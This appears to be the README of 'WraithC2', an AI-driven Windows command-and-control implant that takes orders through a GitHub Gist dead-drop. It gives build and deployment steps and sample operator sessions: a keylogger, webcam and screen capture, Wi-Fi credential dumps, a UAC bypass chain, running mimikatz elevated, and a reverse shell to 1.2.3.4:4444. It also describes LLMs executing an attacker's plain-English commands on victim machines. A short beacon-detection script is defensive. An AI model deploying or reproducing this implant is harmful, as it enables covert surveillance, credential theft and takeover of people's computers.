AI-powered post-exploitation framework — GitHub Gist dead-drop transport, no open port required.
Warning
DO NOT run wraith.exe or wraith.py on your own machine or any machine you are not prepared to fully reimage.
Once executed, the agent:
- Installs registry persistence and a scheduled task that survive reboots
- Hooks the keyboard system-wide (keylogger)
- Can lock out Task Manager, prevent admin-elevated processes, and interfere with UAC prompts if instructed recklessly
- Polls an external server every few seconds — this runs silently in the background with no visible window
Always deploy inside an isolated VM with no snapshots shared with your host, network-isolated from your real environment. Running it on your daily-use machine will compromise that machine. The author takes no responsibility for self-inflicted compromise.
WraithC2 lets you control a Windows agent using plain English. Commands travel through a private GitHub Gist, so there is no listening server and no exposed IP. An LLM (NVIDIA NIM, OpenRouter, Anthropic, or Groq — your choice) interprets every instruction and executes the best action automatically.
```
Operator Machine                       Target Machine
----------------                       ---------------
control.py   <---- GitHub Gist ---->   wraith.exe
(CLI)              dead-drop           (agent)

OP> @PC01: list running processes
        JSON command -> Gist
                                       agent polls Gist every 5 s
                                       AI interprets: "processes" action
                                       runs tasklist, posts result -> Gist
        result read back
RESULT: [chrome.exe, explorer.exe ...]
```
No port forwarding. No VPS. No firewall rule. Just a free GitHub account.
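From a defender's side, the fixed-interval polling described above is the transport's main network signature. The added example below (not part of WraithC2) flags sources that contact GitHub API or Gist hosts on a near-constant timer, using only the destination host because the traffic is HTTPS. The log format, the watched host list, the host names PC01/DEV07/PC02 and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Assumption: the dead-drop appears in proxy/DNS logs as one of these hosts.
WATCHED_HOSTS = {"api.github.com", "gist.github.com", "gist.githubusercontent.com"}

def parse(line):
    """Parse '<ISO-8601 time> <source> <destination host>' (constructed format)."""
    ts, src, dst = line.split()
    return datetime.fromisoformat(ts), src, dst.lower()

def find_beacons(lines, min_events=10, max_interval=60.0, max_jitter=0.2):
    """Return {source: mean gap in seconds} for sources polling on a timer.

    Flagged when a source has enough requests to a watched host, the mean gap
    is short, and the gaps are nearly constant (stdev / mean <= max_jitter).
    """
    seen = defaultdict(list)
    for line in lines:
        ts, src, dst = parse(line)
        if dst in WATCHED_HOSTS:
            seen[src].append(ts)
    flagged = {}
    for src, times in seen.items():
        if len(times) < max(min_events, 3):
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if 0 < avg <= max_interval and pstdev(gaps) / avg <= max_jitter:
            flagged[src] = round(avg, 1)
    return flagged

def sample_log():
    """Constructed data: PC01 polls every ~5 s, DEV07 calls the API irregularly."""
    t0 = datetime(2026, 3, 10, 6, 40, 0)
    stamp = lambda s: (t0 + timedelta(seconds=s)).isoformat()
    lines = [f"{stamp(5 * i + (i % 2) * 0.4)} PC01 api.github.com" for i in range(15)]
    for s in (3, 4, 40, 41, 42, 300, 310, 900, 905, 2000, 2001, 3600):
        lines.append(f"{stamp(s)} DEV07 api.github.com")
    lines += [f"{stamp(5 * i)} PC02 updates.example.com" for i in range(15)]
    return lines

if __name__ == "__main__":
    print(find_beacons(sample_log()))
```

CI runners and Git clients also poll GitHub, so treat a hit as a lead to correlate with endpoint telemetry such as new HKCU Run key values or scheduled tasks on the flagged host.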
| Category | Details |
|---|---|
| Transport | GitHub Gist dead-drop (HTTPS only, no listening port) |
| AI interpreter | Natural-language -> action via NVIDIA NIM / OpenRouter / Anthropic / Groq |
| Stealth | Single EXE, no console window, all subprocesses hidden |
| Persistence | HKCU registry run key + scheduled task (no admin needed for HKCU) |
| UAC bypass | fodhelper -> eventvwr -> sdclt (auto-sequence, three methods) |
| Keylogger | Start/stop/timed capture via pynput, auto-upload results |
| Webcam | Single camera or all connected cameras via OpenCV |
| Screenshots | Single capture or continuous stream |
| Exec code | Run PowerShell / Python / VBScript / Batch generated by AI |
| Run elevated | Launch any .exe with admin rights via ShellExecuteEx runas |
| Reverse shell | Raw TCP, auto test-connect before launching |
| File transfer | Agent->Operator via GitHub repo; Operator->Agent via gofile.io |
| Clipboard | Read current clipboard contents |
| Wi-Fi creds | Dump all saved wireless profiles |
| Narration | AI summarises every result in plain English |
```
git clone https://github.com/farooq9/wraithc2
cd wraithc2
python -m venv .venv
.venv\Scripts\activate                                  # Windows
pip install -r requirements.txt
python .venv\Scripts\pywin32_postinstall.py -install    # Windows only
```

```
python control.py
```

On first run (or type `setup` at the prompt) the wizard will ask for:
- AI provider + model
- API key
- GitHub Gist ID + Personal Access Token
- (Optional) Private repo for file drops
- (Optional) Apache upload URL for large files
It writes config.py automatically.
```
compile.bat    # Windows — produces dist\wraith.exe
```

Or manually:

```
pyinstaller --onefile --noconsole --name wraith --runtime-tmpdir . wraith.py
```

Copy `dist\wraith.exe` to the target and run it.
Back on your machine:
```
python control.py

OP> list
Agents (1):
  DESKTOP-AB1234  last seen: 2026-03-10T06:41:00Z

OP> @DESKTOP-AB1234: take a screenshot
[sent] -> DESKTOP-AB1234 id=a1b2c3d4
[waiting for result...]
RESULT: [screenshot] https://catbox.moe/...jpg

OP> @DESKTOP-AB1234: run C:\Tools\mimikatz.exe with admin privileges and give me the PID
RESULT: [run_elevated] Launched with admin rights. PID: 4812 Status: running

OP> @DESKTOP-AB1234: capture keystrokes for 60 seconds
RESULT: [keylog_timed] Keylogger started, will auto-stop in 60s...

OP> @DESKTOP-AB1234: connect to 1.2.3.4 port 4444
RESULT: [reverse_shell] Connecting reverse shell to 1.2.3.4:4444...
```
| Command | Description |
|---|---|
| `list` | Show online agents |
| `@HOST: <task>` | Send any natural-language task to one agent |
| `all: <task>` | Broadcast task to every online agent |
| `results` | Read all pending results |
| `deliver @HOST /path` | Upload file via gofile.io -> agent downloads it |
| `clear @HOST` / `clear all` | Wipe result(s) from Gist |
| `setup` | Re-run configuration wizard |
| `build` | Show compile instructions |
| `help` | Full command reference |
| `exit` | Quit |
| Provider | Free Tier | Get Key |
|---|---|---|
| NVIDIA NIM | Yes | https://build.nvidia.com |
| OpenRouter | Yes (many :free models) | https://openrouter.ai/keys |
| Anthropic | No (paid) | https://console.anthropic.com |
| Groq | Yes | https://console.groq.com |
Run setup in the CLI to switch provider or model at any time.
```
wraithc2/
  wraith.py          Agent / implant (compile -> wraith.exe)
  control.py         Operator CLI (run on your machine)
  config.py          Shared configuration (generated by setup wizard)
  compile.bat        One-click agent compiler (Windows)
  requirements.txt   Python dependencies
  README.md          This file
  CONTRIBUTING.md    Contributing to WraithC2
```
```
requests        Gist transport + HTTP uploads
pynput          Keylogger / keyboard hooks
Pillow          Screenshots
pywin32         Windows API (registry, clipboard, DLL injection)
opencv-python   Webcam capture
pycaw           Volume control
pyinstaller     Compile to EXE
```
Full list: requirements.txt
This software is intended for:
- Authorised penetration testing on systems you own or have explicit written permission to test
- Academic/educational research in controlled environments
- Red team exercises with proper engagement authorisation
Unauthorised use against systems you do not own is illegal under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent laws worldwide. The authors accept no responsibility for misuse.